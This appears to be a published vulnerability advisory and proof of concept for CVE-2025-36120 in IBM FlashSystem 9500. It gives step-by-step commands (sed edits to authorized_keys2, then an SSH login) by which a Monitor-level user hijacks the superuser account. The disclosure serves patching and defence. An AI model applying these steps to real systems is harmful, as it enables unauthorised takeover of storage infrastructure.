Research & Development
$ #

CVE-2025-36120

Improper authorization in the IBM FlashSystem leads to privilege escalation via SSH authorized keys

8.8 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

IBM FlashSystem 9500

v8.6.0.3

Jakub Sajniak and Patryk Rejchert

IBM FlashSystem allows a user to provide their SSH key, which is then written to the authorized_keys file. Using a set of limited commands in rbash, threat actor can perform a privilege escalation by overwriting the SSH_LABEL_ID within the authorized_keys file. This results in the account takeover of the superuser with just Monitor access privileges.

  1. Login as Monitor user
  2. Observe our user has 16 ID (lsuser command)
  3. Upload the SSH key (e.g. via GUI), use public key generated with:
    ssh-keygen -t rsa
Image 1: Manage SSH Public Key
  1. Observe it has been saved in authorized_keys2:
    IBM_FlashSystem:[REDACTED]:pentest1>more .ssh/authorized_keys2
    environment="SSH_LABEL_ID=0",environment="SSH_EPOCH=1" ssh-rsa [REDACTED]

    [...]

    environment="SSH_LABEL_ID=16",environment="SSH_EPOCH=1" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCsGlWK1j1gRCJdYtvI+YWioIsAmc1p7Qj6vug5bAtBG14mQol+X5sPXRr1y3cqMwFNEn8tPQgGrER8za4ec6A3o5slM2ZcBrUAIQQf1iU7AtpKstsm0E5gliFrRx6XbWRWyZKmSclpFsm2kL0uxVZTuqcWOB7uN4pPQ8Ozlv0
    bt1CyU5oL+w2jEc4C+MVYy8Fmp3CVEAhTrzw//7FJRCAsc1MpBZnJZvjtdtw0DfPo8GhdiQkpCjQgsd9AUkFcDqIlOjELVW0VXqWHnRKzMlwaEnc3TWu/9wIXhA509C5b6i44pvSA0cBwvbDSZooACc/SH9RgDrYd0v5C4JpKXciVRGvlbTHXRQDwEuq9nIcAQMlePtFT7w9W2PRUuK+Y8cK0r0sZ4CcOZiLkpN+VyCUY4uc98EnFyr7opAxYRV0b73Pn5K
    GcrqNc30Y89+IVg2qdLJblpRrAdlWMdB6cuSALblrHXyfR2D5grbkXu/iOIF0ExNLPk8v/eRZhrOBi1UZAZlG1MK/wg8h+UgACSwjN7a6Wo8R7VX/Bwmimd6xcxsziBwPbULJMvTYKlfzbNhYFK4qSq4y6n6OeUpxcggPqvMTsbXuI1/n/q5jxYflyff7ZdbXPVG+IKaNOElU8mQjxVts5Ryn8D/dM/Jtik4eF3O6Q7Vr4g8E3QYoMG+7UyQ==
  1. Change the SSH_LABEL_ID to 0 so it will point to superuser - it is required to change SSH_EPOCH to same as user to be hijacked:
    sed -ie 's/environment="SSH_LABEL_ID=0"/environment="SSH_LABEL_ID=30"/g' .ssh/authorized_keys2 # this changes the superuser so it is not duplicated

    sed -ie 's/environment="SSH_LABEL_ID=16"/environment="SSH_LABEL_ID=0"/g' .ssh/authorized_keys2 # this changes our user key to superuser

  2. Use the private key generated before to login as superuser:
    ssh -i key superuser@[REDACTED]

    IBM_FlashSystem:[REDACTED]:superuser>

  • 11-07-2025 - Vulnerability reported to vendor
  • 27-08-2025 - Security advisory is published by the vendor
  • 19-12-2025 - PoC published

https://www.ibm.com/support/pages/node/7240796
https://www.cve.org/CVERecord?id=CVE-2025-36120